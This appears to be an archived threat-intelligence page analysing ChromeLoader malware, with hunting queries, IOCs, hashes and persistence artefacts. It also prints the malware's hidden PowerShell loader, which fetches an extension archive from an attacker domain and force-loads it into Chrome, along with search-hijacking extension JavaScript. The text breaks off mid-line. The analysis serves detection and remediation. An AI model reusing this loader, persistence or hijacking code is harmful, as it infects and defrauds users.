{
	"id": "23227f5d-2255-4b45-8fb3-b69f6b1e36b4",
	"created_at": "2026-04-06T00:06:36.464156Z",
	"updated_at": "2026-04-10T03:31:13.356276Z",
	"deleted_at": null,
	"sha1_hash": "12dd4a9ac63cde364293c6cb9b7e444cf601abcd",
	"title": "Threat-Remediation-Scripts/Threat-Track/CS_INSTALLER at main · xephora/Threat-Remediation-Scripts",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 504891,
	"plain_text": "Threat-Remediation-Scripts/Threat-Track/CS_INSTALLER at\r\nmain · xephora/Threat-Remediation-Scripts\r\nBy xephora\r\nArchived: 2026-04-05 17:55:38 UTC\r\nObserved malicious IOCs for the ChromeLoader/CS_installer aka Choziosi\r\nLoader Malware\r\nCrowdStrike Query to hunt for ChromeLoader\r\nChromeLoader ScriptContent!=null\r\n| dedup ComputerName\r\n| rex field=ScriptContent \"(?\u003cMaliciousDomain\u003e(\\$domain = \\\"[a-zA-Z0-9.]*.))\"\r\n| table _time ComputerName ScriptContent MaliciousDomain\r\nCommandLine=\"*CS_installer.exe*\" FilePath=\"*CdRom*\"\r\n| dedup ComputerName\r\n| table _time ComputerName CommandLine FilePath SHA256HashData\r\nSigma Rule for ChromeLoader available (Thanks to Twitter User @Kostastsale)\r\nTwitter Reference: https://twitter.com/Kostastsale/status/1480821678145826818\r\nSigma Rule: https://github.com/tsale/Sigma_rules/blob/main/malware/ChromeLoader.yml\r\nDate of first occurrence\r\n01-02-2022\r\nDescription:\r\nCS_installer/ChromeLoader starts off as an ISO that masquerades as Video Game Cheats/Illegal\r\nSoftware/Freeware, also advertised on twitter via QR Codes. It was observed that the malicious ISO was\r\ndownloaded as a zipped archive. Once downloaded and extracted, the victim runs the ISO on their machine which\r\non Windows 10 or above mounts to disk. The ISO contains a malicious binary named CS_installer.exe (also seen\r\nas setup.exe) and a Win32 API for scheduletask along with configurations files and a symbols file. Once mounted,\r\nthe folder containing the malicious binary is locked and will not be removed by the antivirus client. It requires\r\ndismounting of the disk image to release the binary. Upon execution of the binary CS_installer.exe , numerous\r\npersistence mechanisms are created and also a Chrome Extension is downloaded and saved to disk. Once the\r\nextension is saved, it extracts the data and installs it into Chrome. The persistence is configured to execute a\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 1 of 18\n\nPowerShell command that runs a base64 encoded payload which will ensure the ChromeExtension remains on the\r\nmachine. It was also observed that the powershell command removes the previously registered scheduled task\r\nbefore creating one again and repeats the Chrome Extension installation process.\r\nSample Analysis\r\nhttps://app.any.run/tasks/bfb74c9f-89d0-4c3b-8c65-233677cdbfc5\r\nDomains Observed\r\nhxxps[://]learnataloukt[.]xyz\r\nhxxps[://]brokenna[.]work\r\nhxxps[://]yflexibilituky[.]co\r\nhxxps[://]ktyouexpec[.]xyz reported by Twitter user @th3_protoCOL https://twitter.com/th3_protoCOL/st\r\nhxxps[://]withyourret[.]xyz reported by Twitter user @th3_protoCOL https://twitter.com/th3_protoCOL/st\r\nhxxps[://]bosscast[.]net reported by Twitter user @cbecks_2\r\nhxxps[://]soap2day[.]ac reported by Twitter user @cbecks_2\r\nhxxps[://]wallpaperaccess[.]com reported by Twitter user @cbecks_2\r\nhxxps[://]uploadhaven[.]com reported by Twitter user @cbecks_2 and @ffforward https://twitter.com/fffo\r\nhxxps[://]steamunlocked[.]net reported by Twitter user @ffforward https://twitter.com/th3_protoCOL/statu\r\nhxxps[://]etterismype[.]co reported by Twitter user @cbecks_2 https://twitter.com/cbecks_2/status/14809941\r\nhxxps[://]downloadfree101.com reported by Twitter user @StopMalvertisin https://twitter.com/StopMalverti\r\nhxxps[://]ithconsukultin[.]com reported by Twitter user @Enadanil https://twitter.com/Enadanil/status/148\r\nhxxps[://]tobepartou[.]com reported by Twitter user @Enadanil https://twitter.com/Enadanil/status/148\r\nhxxps[://]yeconnected[.]com\r\nhxxps[://]idwhitdoe[.]work\r\nhxxps[://]yeconnected[.]com\r\nMalicious ISO\r\nThe Naming convention of the ISOs appear to be targeting young adults. These names consistenly change each\r\ninfection it seems.\r\nUniversal Chat Spammer.iso\r\nRoblox Muscle Legends Script _ AutoFarm + More ....iso\r\n[UPDATED] Bee Swarm Simulator Script GUI _ Hack....iso\r\nThis_Young_Maidenhead_Family_Now_Makes_15800_..._1.iso\r\nThe Sims 4 [w_ ALL DLC] Free Download.iso\r\nHow To Install Shaders For Minecraft 1.18.1_1....iso =\u003e reported by reddit user remuchiiee\r\nTwisted Lies by Shandi Boyes.iso\r\nFile_ BONEWORKS.v1.6.zip ....iso\r\nhttps://www.virustotal.com/gui/file/fa52844b5b7fcc0192d0822d0099ea52ed1497134a45a2f06670751ef5b33cd3\r\nhttps://www.virustotal.com/gui/file/b43767a9b780ba91cc52954aa741be1bddb0905b492e481aea992bca2a0c6a93\r\nhttps://www.virustotal.com/gui/file/860c1f6f3393014fd84bd29359b4200027274eb6d97ee1a49b61e038d3336372\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 2 of 18\n\nhttps://www.virustotal.com/gui/file/ad68453553a84e03c70106b7c13a483aa9ff1987621084e22067cb1344f52ab7\r\nhttps://www.virustotal.com/gui/file/cd999181de69f01ec686f39ccf9a55131a695c55075d530a44f251a8f41da7c8\r\nhttps://www.virustotal.com/gui/file/0fb038258bbbc61d4f43cac585ec92c79a9a231bcd265758c23c78f96ac1dbb2\r\nhttps://www.virustotal.com/gui/file/3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3\r\nhttps://www.virustotal.com/gui/file/e132de4b3b6b6135121c809e43c0adf3ebf10cb92e7b3c989c24c68ed970a6e6\r\nhttps://www.virustotal.com/gui/file/03b2f267de27dae24de14e2c258a18e6c6d11581e6caee3a6df2b7f42947d898\r\nhttps://www.virustotal.com/gui/file/e449eeade197cab542b6a11a3bcb972675a1066a88cfb07f09e7f7cbd1d32f6d\r\nhttps://www.virustotal.com/gui/file/785f4ee0b26aac97429cdf99b04d2dab44798f2554b61512b49b59f834e91250\r\nhttps://www.virustotal.com/gui/file/e1f9968481083fc826401f775a3fe2b5aa40644b797211f235f2adbeb0a0782f\r\nAdditional Hashes reported by twitter user @cbecks_2\r\n0ecbe333ec31a169e3bce6e9f68b310e505dedfed50fe681cfd6a6a26d1f7f41\r\n1717de403bb77e49be41edfc398864cfa3e351d9843afc3d41a47e5d0172ca79\r\n18073ce19f3391f82c649a244b5555a88124fb6f496c28a914aa0f4ce139e3f2\r\n1b4786ecc9b34f30359b28f0f89c0af029c7efc04e52832ae8c1334ddd2b631e\r\n2e006a8e9f697d8075ba68ab5c793670145ea56028c488f1a00b29738593edfb\r\n31b2944fb4d13a288497e64b2c4a110127e3f685fae38860aaf68336f7804d13\r\n3927e4832dcbfae7ea9e2622af2a37284ceaf93b86434f35878e0077aeb29e7e\r\n41cc04487a80093df4ac9bb64afc44eb6492bb49fc125b4601cd53476f18d5a4\r\n614e2c3540cc6b410445c316d2e35f20759dd091f2f878ddf09eda6ab449f7aa\r\n66f2ade2a78843c91445f808673d6ae0fe3a13402faac2962f04544a62ffbc2d\r\n6d89c1cd593c2df03cdbd7cf3f58e2106ff210eeb6f60d5a4bf3b970989dee2e\r\n8840f385340fad9dd452e243ad1a57fb44acfd6764d4bce98a936e14a7d0bfa6\r\n9ab4665f627e17377f7feda1d3ca4facb5448db587d4d22d2740585ab3fb1f54\r\n9dd11c756bdf612f372f3d37410bcc469f586f2fc826df5c679b3e77501c9371\r\na9670d746610c3be342728ff3ba8d8e0680b5ac40f4ae6e292a9a616a1b643c8\r\nbcc6cfc82a1dc277be84f28a3b3bb037aa9ef8be4d5695fcbfb24a1033174947\r\ndd2da35d1b94513f124e8b27caff10a98e6318c553da7f50206b0bfded3b52c9\r\nedeec82c65adf5c44b52fbdc4b7ff754c6bd391653bba1e0844f0cab906a5baf\r\nfb9cce7a3fed63c0722f8171e8167a5e7220d6f8d89456854c239976ce7bb5d6\r\nmounted ISO mainly contains:\r\n\\Device\\CdRom0\\CS_INSTALLER.EXE (Also seen as setup.exe)\r\n\\Device\\CdRom0\\CS_installer.exe.config\r\n\\Device\\CdRom0\\CS_installer.pdb\r\n\\Device\\CdRom0\\CS_installer.pdb\r\n\\Device\\CdRom0\\Microsoft.Win32.TaskScheduler.dll\r\n\\Device\\CdRom0\\_meta.txt\r\nCS_installers\r\nhttps://www.virustotal.com/gui/file/ded20df574b843aaa3c8e977c2040e1498ae17c12924a19868df5b12dee6dfdd\r\nhttps://www.virustotal.com/gui/file/5f57a4495b9ab853b9d2ab7d960734645ebe5765e8df3b778d08f86119e1695c\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 3 of 18\n\nhttps://www.virustotal.com/gui/file/187e08fca3ea9edd8340aaf335bd809a9de7a10b2ac14651ba292f478b56d180\r\nhttps://www.virustotal.com/gui/file/1dbe5c2feca1706fafc6f767cc16427a2237ab05d95f94b84c287421ec97c224\r\nhttps://www.virustotal.com/gui/file/5c07178b0c44ae71310571b78dde5bbc7dc8ff4675c20d44d5b386dfb4725558\r\nhttps://www.virustotal.com/gui/file/42afb7100d3924915fde289716def039cd14d8116757061df503874217d9b047\r\nhttps://www.virustotal.com/gui/file/2df0cf38c8039745f0341fc679d1dd7a066ec0d2e687c6914d2a2256f945d96d\r\nReported by Twitter user @cbecks_2\r\nhttps://www.virustotal.com/gui/file/aed9351ff414ddf1ecbfeb747b0bc6d650fcf026290cb670cbbaaad02fdf3dcd\r\nReported by Twitter user @cbecks_2\r\nhttps://www.virustotal.com/gui/file/dca529c6ec9ea1f638567d5b6c34af4f47a80c0519178c4829becc337db5be02\r\nReported by Twitter user @cbecks_2\r\nAdditional CS_installer.exe hashes added 01-24-2022\r\n9eca0cd45c00182736467ae18da21162d0715bd3d53b8df8d92a74a76a89c4a0\r\n564e913a22cf90ede114c94db8a62457a86bc408bc834fa0e12e85146110c89b\r\nc56139ea4ccc766687b743ca7e2baa27b9c4c14940f63c7568fc064959214307\r\n53347d3121764469e186d2fb243f5c33b1d768bf612cc923174cd54979314dd3\r\n44464fb09d7b4242249bb159446b4cf4c884d3dd7a433a72184cdbdc2a83f5e5\r\nafc8a5f5f8016a5ce30e1d447c156bc9af5f438b7126203cd59d6b1621756d90\r\n2d4454d610ae48bf9ffbb7bafcf80140a286898a7ffda39113da1820575a892f\r\nObserved behavior\r\nReads hostname\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\r\nOS Credential Dumping\r\nDNSCompatibility.exe\r\nChecks Windows Trust Settings\r\nHKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUSTPROVIDERS\\SOFTWARE\r\nReads settings of System Certificates\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\305F8BD17AA2CBC483A4C41B19A39A0\r\n5DA39D6\r\nChecks supported languages\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\r\nEnvironmental Variables\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\r\nChecks Windows Installation Data\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 4 of 18\n\nEnumeration of Software\r\nDNSCompatibility.exe\r\nScheduled Task\r\nChromeLoader uses a Windows API Microsoft.Win32.TaskScheduler to create a Scheduled task\r\nChromeLoader uses a dictionary to name the scheduled task.\r\nstring[] namesDict = new string[]\r\n{\r\n\"Loader\",\r\n\"Monitor\",\r\n\"Checker\",\r\n\"Conf\",\r\n\"Task\",\r\n\"Updater\"\r\n};\r\nint nameIndex = new Random().Next(namesDict.Length);\r\nstring taskName = \"Chrome\" + namesDict[nameIndex];\r\nts.RootFolder.RegisterTaskDefinition(taskName, td);\r\nChromeLoader\r\nChromeMonitor\r\nChromeChecker\r\nChromeConf\r\nChromeTask\r\nChromeUpdater\r\nThe scheduled task contains the following command which executes a PowerShell command with a base64\r\npayload.\r\ncmd /c start /min \"\" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E \u003cbase64EncodedPayload\u003e\r\nI have observed two scenarios of how the base64 payload is executed.\r\n1. A descramble function exists to reconstructs base64 payload.\r\nDictionary\u003cchar, char\u003e replaceDict = new Dictionary\u003cchar, char\u003e\r\n{\r\n \u003cdictionary of characters\u003e\r\n}\r\nforeach (char c in File.ReadAllText(\"_meta.txt\"))\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 5 of 18\n\n{\r\nif (replaceDict.ContainsKey(c))\r\n{\r\nres += replaceDict[c].ToString();\r\n}\r\nelse\r\n{\r\nres += c.ToString();\r\n}\r\n}\r\nreturn res;\r\n2. The PowerShell command may be hardcoded into the malware binary CS_installer.exe . Shown in the\r\nbelow images.\r\nRetrieving ChromeLoader Scheduled Tasks using PowerShell\r\nGet-ScheduledTask -Taskname \"ChromeLoader\" -EA SilentlyContinue\r\nGet-ScheduledTask -Taskname \"ChromeTask\" -EA SilentlyContinue\r\nGet-ScheduledTask -Taskname \"ChromeConf\" -EA SilentlyContinue\r\nGet-ScheduledTask -Taskname \"ChromeUpdater\" -EA SilentlyContinue\r\nGet-ScheduledTask -Taskname \"ChromeMonitor\" -EA SilentlyContinue\r\nGet-ScheduledTask -Taskname \"ChromeChecker\" -EA SilentlyContinue\r\nScheduled Task Location# 1\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 6 of 18\n\nLocation 1: C:\\windows\\system32\\tasks\\ChromeLoader\r\nLocation 1: C:\\windows\\system32\\tasks\\ChromeTask\r\nLocation 1: C:\\windows\\system32\\tasks\\ChromeConf\r\nLocation 1: C:\\windows\\system32\\tasks\\ChromeMonitor\r\nLocation 1: C:\\windows\\system32\\tasks\\Chromeupdater\r\nLocation 1: C:\\windows\\system32\\tasks\\ChromeChecker\r\nContents of the scheduled task\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cDate\u003e2022-01-08T12:48:01.586-05:00\u003c/Date\u003e\r\n \u003cDescription\u003eExample task\u003c/Description\u003e\r\n \u003cURI\u003e\\ChromeLoader\u003c/URI\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\n \u003cTimeTrigger\u003e\r\n \u003cRepetition\u003e\r\n \u003cInterval\u003ePT10M\u003c/Interval\u003e\r\n \u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n \u003c/Repetition\u003e\r\n \u003cStartBoundary\u003e2022-01-08T12:49:01.55-05:00\u003c/StartBoundary\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003c/TimeTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003etrue\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003etrue\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003efalse\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cDuration\u003ePT10M\u003c/Duration\u003e\r\n \u003cWaitTimeout\u003ePT1H\u003c/WaitTimeout\u003e\r\n \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT72H\u003c/ExecutionTimeLimit\u003e\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 7 of 18\n\n\u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003ecmd\u003c/Command\u003e\r\n \u003cArguments\u003e/c start /min \"\" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABo\r\nScheduled Task Location# 2\r\nChromeLoader creates one of the following registry keys for Scheduled task\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeLoade\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeTask\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeConf\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeMonito\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeUpdate\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeChecke\r\nContents of the registry key\r\nProperty Type Value\r\n-------- ---- -----\r\nSD Binary (0x)01,00,04,80,94,00,00,00,b0,00,00,00,00,00,00,00,14,00,00,00,02,00,80,00,04,00,00,00,00,10,18\r\n 5,20,00,00,00,20,02,00,00,00,10,14,00,9f,01,1f,00,01,01,00,00,00,00,00,05,12,00,00,00,00,10,24,0\r\n 15,00,00,00,79,7b,4c,2a,f0,c4,03,8b,df,0b,88,58,ea,03,00,00,00,00,24,00,89,00,12,00,01,05,00,00,\r\n ,c4,03,8b,df,0b,88,58,ea,03,00,00,00,00,00,00,01,05,00,00,00,00,00,05,15,00,00,00,79,7b,4c,2a,f0\r\n 5,00,00,00,00,00,05,15,00,00,00,79,7b,4c,2a,f0,c4,03,8b,df,0b,88,58,01,02,00,00\r\nId String {95F41003-19E5-4FEF-BC34-BD6B24044329}\r\nIndex DWord 3\r\nScheduled Task Location# 3\r\nChromeLoader also creates one of the following registry keys.\r\nLocation 3: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Schedule\\TaskCache\\Tasks{X-X-X-X-X}\r\n(To save you time, you can retrieve the task unique identifier by running the powershell command below)\r\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String \"ChromeLoader\"\r\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String \"ChromeTask\"\r\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String \"ChromeConf\"\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 8 of 18\n\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String \"ChromeMonitor\"\r\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String \"ChromeChecker\"\r\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String \"ChromeUpdater\"\r\nContents of the registry key {X-X-X-X-X}\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{53998BBE-E665-4C14-8F\r\nProperty Type Value\r\n-------- ---- -----\r\nPath String \\ChromeLoader\r\nHash Binary (0x)c7,eb,cd,26,ec,d5,2f,5d,59,55,18,03,21,85,e3,c6,32,dc,05,59,2b,1b,d8,04,dc,3f,8c,74,11,b5\r\nSchema DWord 65538\r\nDate String 2022-01-06T13:27:37.271-05:00\r\nDescription String Example task\r\nURI String \\ChromeLoader\r\nTriggers Binary (0x)17,00,00,00,00,00,00,00,00,07,01,00,00,00,06,00,80,b8,45,38,2b,03,d8..[TRUNCATION]\r\nActions Binary (0x)03,00,0c,00,00,00,41,00,75,00,74,00,68,00,6f,00,72,00,66,66..[TRUNCATION]\r\nDynamicInfo Binary (0x)03,00,00,00,98,86,ad,14,2b,03,d8,01,aa,f5,5b,ad,52,06,d8,01,..[TRUNCATION]\r\nSnippet of base64 decoded powershell script\r\n$extPath = \"$($env:LOCALAPPDATA)\\chrome\"\r\n$confPath = \"$extPath\\conf.js\"\r\n$archiveName = \"$($env:LOCALAPPDATA)\\archive.zip\"\r\n$taskName = \"ChromeLoader\"\r\n$domain = \"SomeMaliciousDomain\"\r\n$isOpen = 0\r\n$dd = 0\r\n$ver = 0\r\n(Get-WmiObject Win32_Process -Filter \"name='chrome.exe'\") | Select-Object CommandLine | ForEach-Objec\r\nif($_ -Match \"load-extension\"){\r\nbreak\r\n}\r\n$isOpen = 1\r\n}\r\nif($isOpen){\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 9 of 18\n\nif(-not(Test-Path -Path \"$extPath\")){\r\ntry{\r\nwget \"https://$domain/archive.zip\" -outfile \"$archiveName\"\r\n}catch{\r\nbreak\r\n}\r\nExpand-Archive -LiteralPath \"$archiveName\" -DestinationPath \"$extPath\" -Force\r\nRemove-Item -path \"$archiveName\" -Force\r\n}\r\nelse{\r\ntry{\r\nif (Test-Path -Path \"$confPath\")\r\n{\r\n$conf = Get-Content -Path $confPath\r\n$conf.Split(\";\") | ForEach-Object {\r\nif ($_ -Match \"dd\")\r\n{\r\n$dd = $_.Split('\"')[1]\r\n}elseif ($_ -Match \"ExtensionVersion\")\r\n{\r\n$ver = $_.Split('\"')[1]\r\n}\r\n}\r\n}\r\n}catch{}\r\nif ($dd -and $ver){\r\ntry{\r\n$un = wget \"https://$domain/un?did=$dd\u0026ver=$ver\"\r\nif($un -Match \"$dd\"){\r\nUnregister-ScheduledTask -TaskName \"$taskName\" -Confirm:$fals\r\nRemove-Item -path \"$extPath\" -Force -Recurse\r\n}\r\n}catch{}\r\ntry{\r\nwget \"https://$domain/archive.zip?did=$dd\u0026ver=$ver\" -outfile \"$archiv\r\n}\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 10 of 18\n\ncatch{}\r\nif (Test-Path -Path \"$archiveName\"){\r\nExpand-Archive -LiteralPath \"$archiveName\" -DestinationPath \"$extPath\r\nRemove-Item -path \"$archiveName\" -Force\r\n}\r\n}\r\n}\r\ntry{\r\nGet-Process chrome | ForEach-Object { $_.CloseMainWindow() | Out-Null}\r\nstart chrome --load-extension=\"$extPath\", --restore-last-session, --noerrdialogs, --d\r\n}catch{}\r\n}\r\nDropped Extension location\r\nC:\\users\\\u003cProfile\u003e\\appdata\\local\\chrome\r\nMalicious Extension\r\nsha256sum archive.zip\r\n561f219a76e61d113ec002ecc4c42335f072be0f2f23e598f835caba294a3f9b archive.zip\r\nContents:\r\nbackground.js conf.js manifest.json options.png\r\nSample Extension Configuration\r\ncat conf.js\r\nlet _ExtnensionName = \"Options\";\r\nlet _ExtensionVersion = \"4.0\";\r\nlet _dd = \"MzQ1NDYHAQICAwIGDAEAAgEFAgILBwAMSgoABgYDB0gEAgICAgUHAwAASQ==\";\r\nlet _ExtDom = \"https://krestinaful[.]com/\";\r\nlet _ExtDomNoSchema = \"krestinaful[.]com\"\r\ncat conf.js\r\nlet _ExtnensionName = \"Properties\";\r\nlet _ExtensionVersion = \"4.4\";\r\nlet _dd = \"NzI3MjcGAgYEDwAHAgAFAQQGAwAOAgYASwAKAAYEBU4GBAMGCgQKDwAASw==\";\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 11 of 18\n\nlet _ExtDom = \"https://tobepartou[.]com/\";\r\nlet _ExtDomNoSchema = \"tobepartou[.]com\";\r\nObfuscated Javascript background.js (truncated)\r\ncat background.js\r\nT1MM.q3 = (function () {\r\n var v = 2;\r\n for (; v !== 9;) {\r\n switch (v) {\r\n case 2:\r\n v = typeof globalThis === 'object' ? 1 : 5;\r\n break;\r\n case 1:\r\n return globalThis;\r\n break;\r\n case 5:\r\n var G;\r\n try {\r\n var s = 2;\r\n for (; s !== 6;) {\r\n switch (s) {\r\n case 2:\r\n Object['defineProperty'](Object['prototype'], 'xbHiy', {\r\n 'get': function () {\r\n var J = 2;\r\n for (; J !== 1;) {\r\n switch (J) {\r\n case 2:\r\n return this;\r\n break;\r\n }\r\n }\r\n },\r\n 'configurable': true\r\n });\r\n G = xbHiy;\r\n s = 5;\r\n break;\r\n case 5:\r\n G['QQr8M'] = G;\r\n s = 4;\r\n break;\r\n case 4:\r\n s = typeof QQr8M === 'undefined' ? 3 : 9;\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 12 of 18\n\nbreak;\r\n case 9:\r\n delete G['QQr8M'];\r\n var N = Object['prototype'];\r\n delete N['xbHiy'];\r\n s = 6;\r\n break;\r\n case 3:\r\n throw \"\";\r\n s = 9;\r\n break;\r\n }\r\n }\r\n } catch (l) {\r\n G = window;\r\n }\r\n return G;\r\n break;\r\n }\r\n }\r\n})();\r\nT1MM.A1MM = A1MM;\r\ne7(T1MM.q3);\r\n[TRUNCATION..]\r\nRaw Obfuscated javascript sample\r\nU0MM.i5=(function(){var A=2;for(;A !== 9;){switch(A){case 5:var h;try{var m=2;for(;m !== 6;){switch(m\r\nDeobfuscated Javascript background.js provided by Twitter user @struppigel\r\nhttps://twitter.com/struppigel\r\nBlog post created by Karsten Hahn @struppigel, providing an analysis of the malicious Chrome Extension\r\nhttps://www.gdatasoftware.com/blog/2022/01/37236-qr-codes-on-twitter-deliver-malicious-chrome-extension\r\nhttps://twitter.com/struppigel/status/1489500184371515396\r\nThe purpose of the malicious Chrome Extension is to generate Ad Revenue for the actor. The Chrome Extension\r\nperiodically makes web requests every 30 minutes to generate Ads. Analytics is sent to the attackers domain every\r\n3 hours. This malware has the capability of spreading through the victim's Google Profile via Synchronization.\r\nTurn on and off Google Chrome Synchronization\r\nhttps://support.google.com/chrome/answer/185277?hl=en\u0026co=GENIE.Platform%3DDesktop\r\nhttps://support.google.com/chrome/answer/2765944\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 13 of 18\n\nchrome.webRequest.onBeforeSendHeaders.addListener(n4 =\u003e {\r\n n4.requestHeaders.push({name: \"dd\", value: _dd});\r\n return {requestHeaders: n4.requestHeaders};\r\n}, {urls: [\"*://*.\" + _ExtDomNoSchema + \"/*\"]}, [\"blocking\", \"requestHeaders\"]);\r\nchrome.webRequest.onHeadersReceived.addListener(g4 =\u003e {\r\n if (g4.type !== \"main_frame\") {\r\n return null;\r\n }\r\n g4.responseHeaders.forEach(u4 =\u003e {\r\n if (u4.name === \"is\") {\r\n isValue = u4.value;\r\n setWithExpirySec(\"is\", isValue, 300);\r\n return null;\r\n }\r\n });\r\n}, {urls: [\"*://*.\" + _ExtDomNoSchema + \"/*\"]}, [\"responseHeaders\"]);\r\nchrome.webRequest.onBeforeRequest.addListener(function (s4) {\r\n var O4, L4, R4, r4, p4, F4, i4, w4, b4;\r\n if (s4.type !== \"main_frame\") {\r\n return null;\r\n }\r\n O4 = s4.url;\r\n L4 = new URL(O4);\r\n if (O4.indexOf(\"google.\") \u003e= 0 \u0026\u0026 O4.indexOf(\"search\") \u003e= 0 \u0026\u0026 O4.indexOf(\"q=\") \u003e= 0) {\r\n R4 = L4.searchParams.get(\"q\");\r\n }\r\n if (O4.indexOf(\"search.yahoo.\") \u003e= 0 \u0026\u0026 O4.indexOf(\"p=\") \u003e= 0) {\r\n R4 = L4.searchParams.get(\"p\");\r\n }\r\n if (O4.indexOf(\"bing.\") \u003e= 0 \u0026\u0026 O4.indexOf(\"search\") \u003e= 0 \u0026\u0026 